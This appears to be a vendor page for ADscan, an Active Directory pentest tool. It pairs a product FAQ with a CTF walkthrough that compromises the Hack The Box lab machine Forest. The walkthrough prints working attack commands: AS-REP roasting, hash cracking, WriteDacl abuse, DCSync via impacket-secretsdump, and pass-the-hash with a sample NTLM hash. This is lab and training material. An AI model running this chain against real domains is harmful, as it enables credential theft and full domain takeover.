How does ADscan reduce AD pentest time from 5 days to 2?

ADscan automates enumeration (saves 1-2 days), provides semi-guided exploitation paths (saves 1-2 days), and generates MITRE-mapped reports automatically (saves 0.5-1 day). The operator confirms all actions while ADscan handles the grunt work.

What's the difference between ADscan and PingCastle/Purple Knight?

PingCastle and Purple Knight are excellent risk assessment tools for IT teams. ADscan goes further by executing semi-guided exploitation, building complete attack chains, and outputting pentester-ready MITRE-mapped evidence for consulting deliverables.

How is ADscan different from Pentera?

Pentera is a GUI-based automated platform designed for IT teams to run simulations. ADscan is a CLI tool built for pentesters who need granular control over attack vectors, reproducible evidence, and detailed technical reporting for client deliverables.

Does ADscan work in air-gapped environments?

Yes. ADscan supports offline licenses and includes an optional on-premises license server for completely air-gapped deployments. All tools and wordlists are bundled locally.

What operating systems does ADscan support?

Currently Linux (Kali, Ubuntu, Debian, Parrot). Docker and Windows support are in the near-term roadmap. Design Partners get early access to new platform releases.

Can ADscan integrate with existing pentest workflows?

Yes. ADscan exports to JSON for integration with other tools, generates Word reports using your templates, and works alongside BloodHound, NetExec, and other standard AD pentest tools.

How much does ADscan cost for consulting companies?

PRO seats start at €997/year. Enterprise team packs (5/10/25 seats) include volume discounts, SSO, and priority support. POV Pass available at €249 per 14-day engagement for project-based testing.

What's included in the 14-day POV?

Full ADscan PRO features, setup assistance, Word report generation, and a debrief session with your team lead. No credit card required. Run in your non-production lab environment.

What is the difference between a POV and the Design Partner program?

POV is a 14-day lab evaluation to validate fit. Design Partner is a 90-day collaboration with direct support, early features and limited discounted pricing in exchange for an anonymous/public case.

CTF Walkthrough - Auto-Pwning HTB Forest

This guide demonstrates how ADscan can automatically pwn the retired Hack The Box machine "Forest" in approximately 3 minutes.

Lab Information

Machine: Forest (Retired)
Difficulty: Easy
OS: Windows Server 2016
Domain: htb.local
IP: 10.10.10.161 (example - use your HTB assigned IP)

Prerequisites

✅ ADscan installed and configured
✅ VPN connection to Hack The Box network
✅ tun0 interface active

Walkthrough

Step 1: Initial Setup

Start ADscan and create a workspace:

# Start ADscan with verbose mode
adscan start -v

# Create workspace for this machine
(ADscan) > workspace create htb_forest
(ADscan:htb_forest) >

Step 2: Configure Scan Parameters

# Set VPN interface
(ADscan:htb_forest) > set iface tun0

# Set target IP
(ADscan:htb_forest) > set hosts 10.10.10.161

# Enable automatic mode for speed
(ADscan:htb_forest) > set auto True

Step 3: Start Unauthenticated Scan

(ADscan:htb_forest) > start_unauth

What happens automatically:

[*] Starting unauthenticated scan...
[+] Discovered domain: htb.local
[+] Primary Domain Controller: FOREST.htb.local (10.10.10.161)
[*] Enumerating users via RPC...
[+] Found 31 domain users

Users discovered:
  - Administrator
  - Guest
  - krbtgt
  - svc-alfresco
  - sebastien
  - lucinda
  - andy
  - mark
  ...

[*] Checking for AS-REP roastable accounts...
[+] Found AS-REP roastable account: svc-alfresco
[*] Extracting AS-REP hash...
[+] Hash saved: $krb5asrep$23$svc-alfresco@HTB.LOCAL:...

[*] Attempting to crack hash...
[*] Using wordlist: rockyou.txt
[+] Password cracked: s3rvice

[+] Credentials found!
    Username: svc-alfresco
    Password: s3rvice

[*] Automatically escalating to authenticated scan...

Step 4: Authenticated Enumeration (Automatic)

ADscan automatically continues with authenticated enumeration:

[+] Authenticating as svc-alfresco...
[+] Authentication successful

[*] Enumerating domain users...
[+] Found 31 users

[*] Enumerating domain computers...
[+] Found 1 computer (FOREST.htb.local)

[*] Performing Kerberoasting...
[!] No kerberoastable accounts found

[*] Collecting BloodHound data...
[+] BloodHound data collected successfully

[*] Analyzing BloodHound data for privilege escalation paths...
[+] Found path to Domain Admin!

Path:
  svc-alfresco (Current User)
  └─> Service Accounts (Member)
      └─> Privileged IT Accounts (Member)
          └─> Account Operators (Member)
              └─> Exchange Windows Permissions (WriteDacl)
                  └─> Domain Admins (DCSync Rights)

[*] Exploitation path identified: Exchange Permissions Abuse

Step 5: Privilege Escalation (Automatic)

ADscan exploits the identified path:

[*] Executing privilege escalation...

[*] Step 1: Creating user in Exchange Windows Permissions group
[+] User 'adscan_temp' created

[*] Step 2: Granting DCSync rights to adscan_temp
[+] DCSync rights granted

[*] Step 3: Performing DCSync attack
[*] Dumping domain credentials...
[+] Administrator NTLM hash captured:
    aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

[*] Step 4: Authenticating as Administrator
[+] Domain Admin access achieved!

[*] Dumping all domain hashes...
[+] 31 hashes dumped

[*] Looking for flags...
[+] User flag: c052e7e5a12345...
[+] Root flag: 7a89be2d9cf1...

[✓] Forest pwned in 2m 47s

Step 6: View Discovered Credentials

View all credentials discovered during the attack:

# Display all discovered credentials
(ADscan:htb_forest) > creds show

# TODO: Add real output from 'creds show' command
# Expected to show:
# - svc-alfresco with password 's3rvice'
# - Administrator NTLM hash
# - Other domain user hashes

Attack Chain Breakdown

1. AS-REP Roasting

Vulnerability: svc-alfresco account has pre-authentication disabled

Exploitation:

# ADscan automatically:
# 1. Identifies AS-REP roastable accounts
# 2. Requests AS-REP hash
# 3. Cracks hash offline
# 4. Gains initial access

2. BloodHound Analysis

Vulnerability: Complex group membership path to Exchange permissions

Path discovered:

svc-alfresco
  → Service Accounts
    → Privileged IT Accounts
      → Account Operators
        → Exchange Windows Permissions (WriteDacl)
          → DCSync Rights

3. WriteDacl Abuse

Vulnerability: Exchange Windows Permissions has WriteDacl on domain object

Exploitation:

# ADscan automatically:
# 1. Creates user in Account Operators group
# 2. Adds user to Exchange Windows Permissions
# 3. Grants DCSync rights
# 4. Performs DCSync attack
# 5. Captures Administrator hash

4. Pass-the-Hash

Technique: Authenticate as Administrator using NTLM hash

Result: Full Domain Admin access

Manual Mode Alternative

If you prefer more control, use semi-automatic mode:

(ADscan:htb_forest) > set auto False
(ADscan:htb_forest) > start_unauth

# You'll be prompted at each step:
[?] AS-REP roastable account found. Attempt to crack? (y/n): y
[?] Hash cracked. Authenticate with found credentials? (y/n): y
[?] BloodHound path found. Exploit automatically? (y/n): y
[?] DCSync rights obtained. Dump domain hashes? (y/n): y

Timing Breakdown

Automatic mode (auto=True):

Unauthenticated scan: ~30 seconds
Hash cracking: ~45 seconds
Authenticated enumeration: ~30 seconds
BloodHound collection: ~20 seconds
Privilege escalation: ~40 seconds
Total: ~2 minutes 45 seconds

Semi-automatic mode (auto=False):

Add ~1-2 minutes for manual prompts
Total: ~4-5 minutes

Tips for Other HTB Machines

Active (Retired)

workspace create htb_active
set iface tun0
set hosts 10.10.10.100
start_unauth

# ADscan will:
# - Discover SMB shares
# - Find GPP passwords in SYSVOL
# - Kerberoast Administrator
# - Crack TGT and gain DA

Cicada (Retired)

workspace create htb_cicada
set iface tun0
set hosts 10.10.11.35
start_unauth

# ADscan will:
# - Enumerate via RID cycling
# - Identify weak passwords
# - Spray discovered passwords
# - Escalate via ACL abuse

Learning Points

What ADscan Automated

Reconnaissance: RPC user enumeration
Initial Access: AS-REP roasting + hash cracking
Enumeration: BloodHound collection
Analysis: Path finding to DA
Exploitation: WriteDacl abuse + DCSync
Post-Exploitation: Credential dumping

Manual Equivalent

Doing this manually would require:

# 1. User enumeration
rpcclient -U "" -N 10.10.10.161
enumdomusers

# 2. AS-REP roasting
impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users.txt

# 3. Hash cracking
hashcat -m 18200 hash.txt rockyou.txt

# 4. BloodHound collection
bloodhound-python -u svc-alfresco -p s3rvice -d htb.local -dc forest.htb.local -c All

# 5. BloodHound analysis (manual GUI analysis)

# 6. WriteDacl exploitation
net rpc user create adscan_temp password -U svc-alfresco -S forest.htb.local
# ... multiple manual steps ...

# 7. DCSync
impacket-secretsdump htb.local/adscan_temp@forest.htb.local

# 8. Pass-the-Hash
impacket-psexec -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@forest.htb.local

Time: 30-60 minutes for experienced pentester

ADscan: ~3 minutes fully automated

Troubleshooting

"Domain not found"

Ensure VPN connection is active:

ping 10.10.10.161

"Hash cracking failed"

Use custom wordlist or John the Ripper:

# ADscan will prompt for alternative cracking
[?] Use custom wordlist? (y/n): y
[?] Select wordlist: custom_ad.txt

"BloodHound upload failed"

Ensure BloodHound CE is running:

adscan check
# Should show BloodHound: ✓ Running

Next Steps

Try other HTB machines: Active, Cicada, Sauna
Join ADscan Discord to share your time
Tweet your asciicast with #ADscan

Scanning Commands - Deep dive into scanning
Workspace Management - Organize scan data

CTF Walkthrough - Auto-Pwning HTB Forest

On this page